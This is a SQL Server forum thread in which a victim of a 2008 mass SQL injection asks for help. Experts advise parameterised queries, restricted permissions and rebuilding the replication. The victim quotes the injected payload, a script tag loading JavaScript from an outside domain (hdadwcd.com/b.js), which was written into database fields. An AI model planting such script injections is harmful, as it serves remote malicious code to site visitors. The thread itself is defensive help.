Click here to monitor SSC
SQLServerCentral is supported by Red Gate Software Ltd.
 
Log in  ::  Register  ::  Not logged in
 
 
 
        
Home       Members    Calendar    Who's On


Add to briefcase

injection attack Expand / Collapse
Author
Message
Posted Wednesday, July 2, 2008 5:03 AM
Forum Newbie

Forum NewbieForum NewbieForum NewbieForum NewbieForum NewbieForum NewbieForum NewbieForum Newbie

Group: General Forum Members
Last Login: Tuesday, June 30, 2009 10:38 AM
Points: 3, Visits: 96
Pleas help me!
I'm under injection attack and i don't no what can i do.
This script ' script src=http://www.hdadwcd.com/b.js /script' is injected to may database (sql server 2000).
It not only injected in many of databases field but also renamed my publication name to :
" publication name script src=http://www.hdadwcd.com/b.js /script "
How can i repair it and stop this injection
How can I edit binary fields in MSrepl_commands and delete this script from command field.
Post #527164
Posted Wednesday, July 2, 2008 6:01 AM


SSC-Forever

SSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-Forever

Group: General Forum Members
Last Login: Yesterday @ 3:21 PM
Points: 42,495, Visits: 35,566
You need to find the application that is vulnerable to injection (you can use profiler to see the commands coming to the database)

There isn't a quick silver bullet on this. You need to find the vulnerable pages and fix them. Change SQL statements to parameterised rather than built up. Restrict the app's permissions to not allow it to directly acces the tables but to use stored procs.

I would suggest that you drop the publication in question and recreate it.



Gail Shaw
Microsoft Certified Master: SQL Server 2008, MVP
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability

We walk in the dark places no others will enter
We stand on the bridge and no one may pass

Post #527203
Posted Thursday, July 3, 2008 3:59 PM


SSCertifiable

SSCertifiableSSCertifiableSSCertifiableSSCertifiableSSCertifiableSSCertifiableSSCertifiableSSCertifiableSSCertifiable

Group: General Forum Members
Last Login: Yesterday @ 6:58 PM
Points: 5,575, Visits: 24,827
When reading this. Scroll up to the top of this page in the upper frame you will see Search: type in the word "injection" (without the quotes) and then click the button labelled Go. And be prepared to read a vast amount of information concerning your problem and some recommended solutions from articles and forums here on SQL ServerCentral

If everything seems to be going well, you have obviously overlooked something.

Ron

Please help us, help you -before posting a question please read

Before posting a performance problem please read
Post #528427
Posted Thursday, July 24, 2008 3:29 AM
Forum Newbie

Forum NewbieForum NewbieForum NewbieForum NewbieForum NewbieForum NewbieForum NewbieForum Newbie

Group: General Forum Members
Last Login: Tuesday, June 30, 2009 10:38 AM
Points: 3, Visits: 96
Hi
Thank you for your last reply.
I resolved that problem by editing all tables and removing that script.
I think it was a new injection method.
This link was helpful:
http://www.msblog.org/index.php?s=yp
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

But I couldn’t resolve a part of problem:
There were many Binary fields in MSrepl_commands containing bad script.
I deleted them because I couldn’t edit them.
I will be pleased to teach “how to edit MSrepl_commands command field and alter its data?”
Yours truly
saeed.
Post #539951
Posted Thursday, July 24, 2008 3:31 AM


SSC-Forever

SSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-Forever

Group: General Forum Members
Last Login: Yesterday @ 3:21 PM
Points: 42,495, Visits: 35,566
The safest fix is probably to completely drop the replication and recreate it.


Gail Shaw
Microsoft Certified Master: SQL Server 2008, MVP
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability

We walk in the dark places no others will enter
We stand on the bridge and no one may pass

Post #539955
Posted Friday, October 26, 2012 9:26 AM
Grasshopper

GrasshopperGrasshopperGrasshopperGrasshopperGrasshopperGrasshopperGrasshopperGrasshopper

Group: General Forum Members
Last Login: Sunday, March 2, 2014 1:41 PM
Points: 18, Visits: 37
Wow, this is an old thread but still very pertinent.

We are rapidly migrating to SQL 2005.

But we were attacked by injection ... every vharchar field in every table replaced with similar .js crap. We restored and the world was good.

But we're trying to find the vulnerability ... of the publically visible pages on the site, (only 5 or 6) all are derived with stored procs and / or our own in house brewed trap.

We are told that SQL2005 and SQL2008 handle SQL injections far better.

We are also about to, within a month, implement a proper SQL Server 2005 mirror. But of course mirrors will merely mirror the injection; right?

I'm babbling ... but beyond stored procs and home grown filters, are there any other known hardware sotweare remedies.

You refer to a profiler to see commands ... where is that?
Post #1377677
Posted Friday, October 26, 2012 9:32 AM


SSC-Forever

SSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-Forever

Group: General Forum Members
Last Login: Yesterday @ 3:21 PM
Points: 42,495, Visits: 35,566
Can you post this in a new thread please?


Gail Shaw
Microsoft Certified Master: SQL Server 2008, MVP
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability

We walk in the dark places no others will enter
We stand on the bridge and no one may pass

Post #1377684
Posted Friday, October 26, 2012 9:38 AM
Grasshopper

GrasshopperGrasshopperGrasshopperGrasshopperGrasshopperGrasshopperGrasshopperGrasshopper

Group: General Forum Members
Last Login: Sunday, March 2, 2014 1:41 PM
Points: 18, Visits: 37
Sorry .. by all means .. I'm new here ... my bad.

A new thread or somewhere you'd prefer?

Robert

Post #1377693
Posted Friday, October 26, 2012 9:43 AM


SSC-Forever

SSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-ForeverSSC-Forever

Group: General Forum Members
Last Login: Yesterday @ 3:21 PM
Points: 42,495, Visits: 35,566
New thread in the appropriate forum. Probably SQL 2005 T-SQL. Some people will look at a thread with lots of replies and not check it, assuming it's answered already.


Gail Shaw
Microsoft Certified Master: SQL Server 2008, MVP
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability

We walk in the dark places no others will enter
We stand on the bridge and no one may pass

Post #1377698
Posted Friday, October 26, 2012 9:48 AM
Grasshopper

GrasshopperGrasshopperGrasshopperGrasshopperGrasshopperGrasshopperGrasshopperGrasshopper

Group: General Forum Members
Last Login: Sunday, March 2, 2014 1:41 PM
Points: 18, Visits: 37
Ok, will do BUT ... the main gist of this post was your mention of the "profiler"?
We are trying to determine the vulnerability?
Post #1377700
« Prev Topic | Next Topic »

Add to briefcase

Permissions Expand / Collapse